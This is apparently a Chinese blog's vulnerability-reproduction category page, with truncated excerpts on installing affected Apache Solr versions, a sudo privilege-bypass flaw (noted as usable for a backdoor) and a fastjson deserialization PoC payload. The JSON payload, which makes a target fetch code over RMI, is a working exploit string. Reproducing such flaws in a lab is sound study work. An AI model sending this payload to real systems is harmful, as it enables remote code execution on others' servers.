分类 - 漏洞复现

2020-08-10 13:41:00    428    0    0
## 0x01 安装 确定影响版本:7.0.1 / 7.1.0 / 7.5.0 / 7.7.1 / 7.7.2 / 8.1.0 / 8.1.1 / 8.2.0 地址:http://archive.apache.org/dist/lucene/solr/8.2.0/ 安装java yum install java-1.8.0-openjdk-* 下载cd到bin目录安装脚本 ./inst
2020-08-10 13:40:44    420    0    0
## 0x01. 说明 管理员可以配置 sudoers 文件,来定义哪些用户可以运行哪些命令。即便限制了用户以 root 身份运行特定或任何命令,该漏洞也可允许用户绕过此安全策略,并完全控制系统。比较鸡肋,可以留后门的方式存在其中比较猥琐。 ## 0x02. 影响范围: sudo 1.8.28 **以前的所有版本!** 我这里复现的测试成功的版本如下,其余没有测。 CentOS7: sudo
2020-08-10 13:38:30    363    0    0
poc ``` {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} ```